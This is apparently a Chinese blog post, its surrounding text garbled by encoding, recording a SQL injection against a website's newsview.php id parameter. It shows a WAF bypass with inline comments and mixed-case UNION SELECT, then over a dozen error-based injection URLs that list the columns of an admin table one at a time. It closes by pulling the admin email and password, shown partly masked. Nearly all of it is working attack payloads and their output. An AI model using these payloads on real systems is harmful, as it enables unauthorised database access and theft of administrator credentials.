ע ¼  
 ӹע
   ʾһ  |  ر
ܰʾ΢֤Ƶ΢ʺŰѹڣ°󶨣°΢  |  ر

ˮ

Щǵ΢âջΪȼ֮

 
 
 
 
 

־

 
 

һζƵע  

2016-10-24 21:36:29|  ࣺ ѧϰ· |  ǩ |ٱ |ֺС 

  LOFTER ҵƬ  |

һ wafιؼ
http://xxxx/newsview.php
?id=-17+/**//**//*!uNiOn*//**//**//*!sElEcT*//**//**/NULL,table_name/**//*!FRoM*//**/(/*!sElEcT*//**/group_concat(table_name) as table_name as table_name/**//*!FRom*/ information_schema.tables where table_schema = database()) as t

group_concat(table_name)סˣ  xxoo(param1,param2) ʽñwafƥ䣬...



ôõ :ע벻 wafƷΧڣ
http://xxxx/newsview.php
?id=1+and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)


ʼֶ~
http://xxxx/newsview.php
?id=1+and(select 1 from(select count(*),concat((select (select ( select distinct concat(0x7e,column_name,0x7e) from information_schema.columns where table_schema = database() and table_name = 'htx_admin' LIMIT 0,1)) from information_schema.columns limit 0,1),floor(rand(0)*2))x from information_schema.columns group by x)a)

ֶ :AdminID

http://xxxx/newsview.php
?id=1+and(select 1 from(select count(*),concat((select (select ( select distinct concat(0x7e,column_name,0x7e) from information_schema.columns where table_schema = database() and table_name = 'htx_admin'  and column_name != 'AdminID'  LIMIT 0,1)) from information_schema.columns limit 0,1),floor(rand(0)*2))x from information_schema.columns group by x)a)

ֶ :AdminEmail


http://xxxx/newsview.php
?id=1+and(select 1 from(select count(*),concat((select (select ( select distinct concat(0x7e,column_name,0x7e) from information_schema.columns where table_schema = database() and table_name = 'htx_admin'  and column_name != 'AdminID' and column_name != 'AdminEmail' LIMIT 0,1)) from information_schema.columns limit 0,1),floor(rand(0)*2))x from information_schema.columns group by x)a)

ֶ :AdminPwd


http://xxxx/newsview.php
?id=1+and(select 1 from(select count(*),concat((select (select ( select distinct concat(0x7e,column_name,0x7e) from information_schema.columns where table_schema = database() and table_name = 'htx_admin'  and column_name != 'AdminID' and column_name != 'AdminEmail' and column_name != 'AdminPwd' LIMIT 0,1)) from information_schema.columns limit 0,1),floor(rand(0)*2))x from information_schema.columns group by x)a)

ֶ :AdminName

http://xxxx/newsview.php
?id=1+and(select 1 from(select count(*),concat((select (select ( select distinct concat(0x7e,column_name,0x7e) from information_schema.columns where table_schema = database() and table_name = 'htx_admin'  and column_name != 'AdminID' and column_name != 'AdminEmail' and column_name != 'AdminPwd'  and column_name != 'AdminName' LIMIT 0,1)) from information_schema.columns limit 0,1),floor(rand(0)*2))x from information_schema.columns group by x)a)

ֶ :AdminTel

http://xxxx/newsview.php
?id=1+and(select 1 from(select count(*),concat((select (select ( select distinct concat(0x7e,column_name,0x7e) from information_schema.columns where table_schema = database() and table_name = 'htx_admin'  and column_name != 'AdminID' and column_name != 'AdminEmail' and column_name != 'AdminPwd'  and column_name != 'AdminName' and column_name != 'AdminTel' LIMIT 0,1)) from information_schema.columns limit 0,1),floor(rand(0)*2))x from information_schema.columns group by x)a)


ֶ :AdminPhoto

http://xxxx/newsview.php
?id=1+and(select 1 from(select count(*),concat((select (select ( select distinct concat(0x7e,column_name,0x7e) from information_schema.columns where table_schema = database() and table_name = 'htx_admin'  and column_name != 'AdminID' and column_name != 'AdminEmail' and column_name != 'AdminPwd'  and column_name != 'AdminName' and column_name != 'AdminTel' and column_name != 'AdminPhoto' LIMIT 0,1)) from information_schema.columns limit 0,1),floor(rand(0)*2))x from information_schema.columns group by x)a)


ֶ :AdminBackground



http://xxxx/newsview.php
?id=1+and(select 1 from(select count(*),concat((select (select ( select distinct concat(0x7e,column_name,0x7e) from information_schema.columns where table_schema = database() and table_name = 'htx_admin'  and column_name != 'AdminID' and column_name != 'AdminEmail' and column_name != 'AdminPwd'  and column_name != 'AdminName' and column_name != 'AdminTel' and column_name != 'AdminPhoto' and column_name != 'AdminBackground' LIMIT 0,1)) from information_schema.columns limit 0,1),floor(rand(0)*2))x from information_schema.columns group by x)a)


ֶ :AdminGender



http://xxxx/newsview.php
?id=1+and(select 1 from(select count(*),concat((select (select ( select distinct concat(0x7e,column_name,0x7e) from information_schema.columns where table_schema = database() and table_name = 'htx_admin'  and column_name != 'AdminID' and column_name != 'AdminEmail' and column_name != 'AdminPwd'  and column_name != 'AdminName' and column_name != 'AdminTel' and column_name != 'AdminPhoto' and column_name != 'AdminBackground' and column_name != 'AdminGender' LIMIT 0,1)) from information_schema.columns limit 0,1),floor(rand(0)*2))x from information_schema.columns group by x)a)


ֶ :AdminRemark



http://xxxx/newsview.php
?id=1+and(select 1 from(select count(*),concat((select (select ( select distinct concat(0x7e,column_name,0x7e) from information_schema.columns where table_schema = database() and table_name = 'htx_admin'  and column_name != 'AdminID' and column_name != 'AdminEmail' and column_name != 'AdminPwd'  and column_name != 'AdminName' and column_name != 'AdminTel' and column_name != 'AdminPhoto' and column_name != 'AdminBackground' and column_name != 'AdminGender' and column_name != 'AdminRemark' LIMIT 0,1)) from information_schema.columns limit 0,1),floor(rand(0)*2))x from information_schema.columns group by x)a)


ֶ :WhyInterested


http://xxxx/newsview.php
?id=1+and(select 1 from(select count(*),concat((select (select ( select distinct concat(0x7e,column_name,0x7e) from information_schema.columns where table_schema = database() and table_name = 'htx_admin'  and column_name != 'AdminID' and column_name != 'AdminEmail' and column_name != 'AdminPwd'  and column_name != 'AdminName' and column_name != 'AdminTel' and column_name != 'AdminPhoto' and column_name != 'AdminBackground' and column_name != 'AdminGender' and column_name != 'AdminRemark' and column_name != 'WhyInterested' LIMIT 0,1)) from information_schema.columns limit 0,1),floor(rand(0)*2))x from information_schema.columns group by x)a)


ֶ :WhatPresenting



http://xxxx/newsview.php
?id=1+and(select 1 from(select count(*),concat((select (select ( select distinct concat(0x7e,column_name,0x7e) from information_schema.columns where table_schema = database() and table_name = 'htx_admin'  and column_name != 'AdminID' and column_name != 'AdminEmail' and column_name != 'AdminPwd'  and column_name != 'AdminName' and column_name != 'AdminTel' and column_name != 'AdminPhoto' and column_name != 'AdminBackground' and column_name != 'AdminGender' and column_name != 'AdminRemark' and column_name != 'WhyInterested' and column_name != 'WhatPresenting' LIMIT 0,1)) from information_schema.columns limit 0,1),floor(rand(0)*2))x from information_schema.columns group by x)a)


ֶ :RegTime


http://xxxx/newsview.php
?id=1+and(select 1 from(select count(*),concat((select (select ( select distinct concat(0x7e,column_name,0x7e) from information_schema.columns where table_schema = database() and table_name = 'htx_admin'  and column_name != 'AdminID' and column_name != 'AdminEmail' and column_name != 'AdminPwd'  and column_name != 'AdminName' and column_name != 'AdminTel' and column_name != 'AdminPhoto' and column_name != 'AdminBackground' and column_name != 'AdminGender' and column_name != 'AdminRemark' and column_name != 'WhyInterested' and column_name != 'WhatPresenting' and column_name != 'RegTime' LIMIT 0,1)) from information_schema.columns limit 0,1),floor(rand(0)*2))x from information_schema.columns group by x)a)


ֶ :LastUpdateTime

http://xxxx/newsview.php
?id=1+and(select 1 from(select count(*),concat((select (select ( select distinct concat(0x7e,column_name,0x7e) from information_schema.columns where table_schema = database() and table_name = 'htx_admin'  and column_name != 'AdminID' and column_name != 'AdminEmail' and column_name != 'AdminPwd'  and column_name != 'AdminName' and column_name != 'AdminTel' and column_name != 'AdminPhoto' and column_name != 'AdminBackground' and column_name != 'AdminGender' and column_name != 'AdminRemark' and column_name != 'WhyInterested' and column_name != 'WhatPresenting' and column_name != 'RegTime'  and column_name != 'LastUpdateTime' LIMIT 0,1)) from information_schema.columns limit 0,1),floor(rand(0)*2))x from information_schema.columns group by x)a)


ֶ :LastLoginTime


http://xxxx/newsview.php
?id=1+and(select 1 from(select count(*),concat((select (select ( select distinct concat(0x7e,column_name,0x7e) from information_schema.columns where table_schema = database() and table_name = 'htx_admin'  and column_name != 'AdminID' and column_name != 'AdminEmail' and column_name != 'AdminPwd'  and column_name != 'AdminName' and column_name != 'AdminTel' and column_name != 'AdminPhoto' and column_name != 'AdminBackground' and column_name != 'AdminGender' and column_name != 'AdminRemark' and column_name != 'WhyInterested' and column_name != 'WhatPresenting' and column_name != 'RegTime'  and column_name != 'LastUpdateTime' and column_name != 'LastLoginTime' LIMIT 0,1)) from information_schema.columns limit 0,1),floor(rand(0)*2))x from information_schema.columns group by x)a)

ֶ :LoginTimes



õ :
:htx_admin

AdminID
AdminEmail
AdminPwd
AdminName
AdminTel
AdminPhoto
AdminBackground
AdminGender
AdminRemark
WhyInterested
WhatPresenting
RegTime
LastUpdateTime
LastLoginTime
LoginTimes


ֶȫˣʼѯֶ
http://xxxx/newsview.php?id=-17+/**//**//*!uNiOn*//**//**//*!sElEcT*//**//**/AdminEmail,AdminPwd/**//*!FRoM*//**/htx_admin

˺ :DPAdmin
:3953xxxxxxxxxxxFxxxDx44
...
 
 
Ķ(144)| (0)
Ƽ

ʷϵĽ

LOFTERĸ

<#--־Ⱥ־--> <#--Ƽ־--> <#--ü¼--> <#--Ƽ--> <#--Ķ--> <#--ҳƼ--> <#--ʷϵĽ--> <#--Ƽ־--> <#--һƪһƪ--> <#-- ȶ --> <#-- Ź --> <#--ұģṹ--> <#--ģṹ--> <#--ģṹ--> <#--ͶƱ-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

ҳ

ҵƬ - ͷ - ֻ - LOFTER APP - Ĵ˲

׹˾Ȩ ©1997-2017